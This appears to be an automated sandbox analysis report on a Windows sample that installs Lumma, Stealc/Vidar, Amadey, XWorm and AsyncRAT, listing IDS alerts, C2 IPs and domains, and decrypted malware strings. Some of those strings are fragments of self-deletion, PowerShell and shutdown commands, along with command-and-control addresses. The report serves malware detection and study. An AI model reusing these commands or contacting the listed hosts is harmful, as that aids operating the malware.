Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Kaspersky Lab
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Panda Security
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Doctor Web
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 360TotalSecurity
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Bitdefender
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Norton
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Sophos
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Comodo
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: WinDefender
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 0123456789
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ------
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ?scr=1
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ComputerName
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: -unicode-
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: VideoID
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ProductName
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: CurrentBuild
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rundll32.exe
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: "taskkill /f /im "
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: " && timeout 1 && del
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: && Exit"
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: " && ren
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Powershell.exe
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: shutdown -s -t 0
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: random
Source: 0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp	String decryptor: 91.212.166.99
Source: 0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp	String decryptor: 4404
Source: 0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp	String decryptor: <123456789>
Source: 0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp	String decryptor: XWorm V5.6
Source: 0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp	String decryptor: USB.exe
Source: 0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp	String decryptor: %LocalAppData%
Source: 0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp	String decryptor: dllhost.exe
Source: 52.2.MSBuild.exe.bc0000.0.unpack	String decryptor: 7707
Source: 52.2.MSBuild.exe.bc0000.0.unpack	String decryptor: 159.100.19.137
Source: 52.2.MSBuild.exe.bc0000.0.unpack	String decryptor: 0.5.8
Source: 52.2.MSBuild.exe.bc0000.0.unpack	String decryptor: false
Source: 52.2.MSBuild.exe.bc0000.0.unpack	String decryptor: yBu0GW2G5zAc
Source: 52.2.MSBuild.exe.bc0000.0.unpack	String decryptor: MIIE7DCCAtSgAwIBAgIQAM+os8tD+NpTWChT8JYtyzANBgkqhkiG9w0BAQ0FADAXMRUwEwYDVQQDDAxUcnVzdCBTZXJ2ZXIwIBcNMjUwMTIwMDM1NjA0WhgPOTk5OTEyMzEyMzU5NTlaMBcxFTATBgNVBAMMDFRydXN0IFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJ5FzkhjuI8et+p8G29QDGsZ28VZ1PtKbMZx8FrxkUQoQBU7DXFh8mfgTQUhWgMqctpupDC+UhQxQkedPdHe9SvuAtpKEWUFOQzNQMTy3JEvHv3UZfM9Ib5ICGCQtcqInk73RbEh7QdFBK6wE57zENL9lXy8aEBeJk/elSNvLTJwbpa+lP20hlBuuyBWqvPd4/DinQJIRYSIEPDa3hcefGCbnoTp3dg9jttDM+MXtGEz4OurkP47+nFeHgQe7FkNCi5UHaiwvNs8JR7L1yR7HTPlvSwRtAkC0STJtczRA93If63bYMkaC+1QNHQR+WN3c9MCK6SLbGk4nMfSiG3ybohbKhNoJIcsdyFyOOn6N54eCaEwwNzDlb1qkor0bemYVuaT3ZRG27H6C9R9eqyoHQ4WTppSBIm+MBQ+gimD6XdEUCBcM0qAvrVFEy+mFn8FIhKAng9fgPnd47WWJGosTjsezqxJTVYYhUn2dm/VU3O0sdfzJ8O9dIO4htYIs+X5PMuBP2HyLGDsa+VpEkayYMYGmiHD6wDrO20+Z5BdbGUikNdfKo4goEu3A/HIa7YuzFN70ma9Qb+7P448L3mu8pLbll+0iUNo2rYrJ+7nMjduOTeKdBPPYNBHj57Zdd1MkQaIBhHNQ04qdBZYUhJclvbLlx1nPLSMQI9XL0NoRDXvAgMBAAGjMjAwMB0GA1UdDgQWBBSnnBI6rWXybai+OiRUoM3TzO1xlTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQCLFgYyTM5EWEcXb2nZYzeqhuu/lhz0AuSDBoXDWQYuV1CgsKoab0s2yZ1v0jRw77uM1AsLSRhBurUqdmn+iZVi/vtys/BrLFwuc/5hQkz5MFZAt2qJFc8QRV8E6jJcjuapfJT4oweDd8J1Dstz2x2g6IV8mT5mApzjom+zZwy0G9Qm6S72xbaz8HZicPNRfDUR0SMg652oet7qMrCa2T5T5lrh3+XDogmC1ofzA2lbWuhOb6LNs0uzjiC/NENspNylQFf1D+odhNDdQQHu91SSZLnouuhb9jErxYvCoW7c5U14xsNPKRAjcONjtPSbhMvIwaApa2/wVSil0bk8dbSLnA6Kx7UBPgls8ec/jhgkHTycXE6U8XoPS+louYxi5EdwvqghzRC/itX+SPBq9pMpN8FWXEgVliWc0ViOwS/okPlCW60cFGU+R0lQbYJDyVDqJBflraw7Hqb7cQS5v2gCgogUQBqD9I7SiYbbqs0GUh/b3Zv+Qt7wKzyEGJNuoRei7uDp1xb5uDNprDkZomqHmiSKc1LggyPY4+rcNLDTEkXPq/cjMI2CzPXEpHARNgMQ/YEzM07I51CLT2Szm7G3z8uIng35vjc24l3AqClQ1dcJHQBIHjEqoqrUGLmjUiFfGuL549Mt6Na3OmoCTb0J+r6S8/sp2l/nX9HqHqAoxA==
Source: 52.2.MSBuild.exe.bc0000.0.unpack	String decryptor: GP97vNLr0Wa9AfljI/phz7VBswKUASqgiIZZNodWNIPzI+56yXWuOpvWNTQgDoUgAOskV2wmjD76A2aVNhUQyD92KSnqDXlLV+P47rGl14aHUzYeuCKUXHJvFlkQk8GfPZNKaXZNiDGmKibSepgjoJIIM3/Vc+3s07D2Dmv8Bo2hYGsNeAEVOq3oF0fCL5kPxaUCQE+9cR0dxZoIfy5DlW14E6ZSTfnUegUZ8g8ADtxIu5h+2fL58CwzpUlLdw8kRHvK2JPYQSAXV3IiMTw58KlB34+Nw51yoc05UAGmWcMJPRuU2+p/l1cNkzDepbf1evSE6bARyi/iao6lMUMD6paEM4DxEFckeqpVjs3BIx6A1EcYTcx8NepXiEhp/eqoqoCjHS/jwuMPB8KLFpBK7upxBrI6YtoB+sFqHq9bo62za97eZbIE5lxlsp88UEhUa6rAgiH9QNyqb+pfOX7MpaYBYpFDqizolVMqtQC20H8E6szaut4gjCIOUqUHhBSgFtWjJGR1F6x4RUn8llIW1Bvn6uRNFur5U9N5XYZxRThgmv05Cr+Qb09v+D95XyOJqvUSTWKXzmr1tMNRcNEyT3g74VybkYdRldrU1n3+MmLM7RsivXydzIm4+qzkyH58CXkq8767vS6MX3HvkK+WsPnITsc0iub7sUPhNwTofv8=
Source: 52.2.MSBuild.exe.bc0000.0.unpack	String decryptor: false
Source: 52.2.MSBuild.exe.bc0000.0.unpack	String decryptor: null
Source: 52.2.MSBuild.exe.bc0000.0.unpack	String decryptor: false
Source: 52.2.MSBuild.exe.bc0000.0.unpack	String decryptor: Default

Source: SQ1NgqeTQy.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ratty Jellyfish_is1

Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:49993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:50018 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.202.5.153:443 -> 192.168.2.5:50019 version: TLS 1.2

Source:

Binary string: c:\zlib-dll\Release\isunzlib.pdb source: 21a4f8ff7d.tmp, 00000019.00000003.2704550146.00000000034D8000.00000004.00001000.00020000.00000000.sdmp, 21a4f8ff7d.tmp, 00000019.00000003.2700524016.00000000031A0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\36469\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\36469

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49728 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49920 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49966 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49935
Source: Network traffic	Suricata IDS: 2059209 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat) : 192.168.2.5:62952 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059203 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat) : 192.168.2.5:65257 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059199 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat) : 192.168.2.5:52901 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059207 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat) : 192.168.2.5:62002 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059189 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat) : 192.168.2.5:53367 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49994 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49991 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49996 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059211 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat) : 192.168.2.5:56084 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059201 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat) : 192.168.2.5:49399 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059191 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat) : 192.168.2.5:52994 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:50054
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 159.100.19.137:7707 -> 192.168.2.5:50030
Source: Network traffic	Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 159.100.19.137:7707 -> 192.168.2.5:50030
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 159.100.19.137:7707 -> 192.168.2.5:50058
Source: Network traffic	Suricata IDS: 2856121 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M2 : 192.168.2.5:50078 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.5:50064 -> 91.212.166.99:4404
Source: Network traffic	Suricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 91.212.166.99:4404 -> 192.168.2.5:50064
Source: Network traffic	Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:50064 -> 91.212.166.99:4404
Source: Network traffic	Suricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.5:50139 -> 91.212.166.99:4404
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:50139 -> 91.212.166.99:4404
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:50064 -> 91.212.166.99:4404
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 91.212.166.99:4404 -> 192.168.2.5:50064
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 91.212.166.99:4404 -> 192.168.2.5:50064
Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:50064 -> 91.212.166.99:4404
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49711 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49993 -> 23.197.127.21:443
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.5:50022 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.5:50021 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50027 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50028 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.202.5.153:443 -> 192.168.2.5:50025
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50053 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50059 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50059 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50061 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50061 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50060 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50060 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50063 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50244 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50257 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50257 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.202.5.153:443 -> 192.168.2.5:50024
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50250 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50250 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50292 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50292 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50289 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50289 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50278 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50278 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50290 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50290 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50313 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50318 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50319 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50325 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50315 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50324 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50312 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50316 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50327 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50321 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50322 -> 116.202.5.153:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 208.95.112.1 80
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 91.212.166.99 4404

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.115/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: breakfasutwy.cyou
Source: Malware configuration extractor	URLs: miniatureyu.lat
Source: Malware configuration extractor	URLs: finickypwk.lat
Source: Malware configuration extractor	URLs: washyceehsu.lat
Source: Malware configuration extractor	URLs: bloodyswif.lat
Source: Malware configuration extractor	URLs: leggelatez.lat
Source: Malware configuration extractor	URLs: savorraiykj.lat
Source: Malware configuration extractor	URLs: shoefeatthe.lat
Source: Malware configuration extractor	URLs: kickykiduz.lat
Source: Malware configuration extractor	URLs: 91.212.166.99
Source: Malware configuration extractor	IPs: 185.215.113.43

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: kickykiduz.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: UrDtxPvdestkLUKCgdoC.UrDtxPvdestkLUKCgdoC replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: breakfasutwy.cyou replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: finickypwk.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: miniatureyu.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: leggelatez.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: shoefeatthe.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: DGGKjBirXBdcY.DGGKjBirXBdcY replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bloodyswif.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: washyceehsu.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: savorraiykj.lat replaycode: Name error (3)

Yara detected Generic Downloader

Source: Yara match	File source: 52.2.MSBuild.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.8a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Macromedia.com.406c2e0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Macromedia.com.4055ad0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Macromedia.com.4055ad0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.66ca5e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.20e131e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: unknown

Network traffic detected: DNS query count 36

Source: global traffic	TCP traffic: 192.168.2.5:50030 -> 159.100.19.137:7707
Source: global traffic	TCP traffic: 192.168.2.5:50064 -> 91.212.166.99:4404

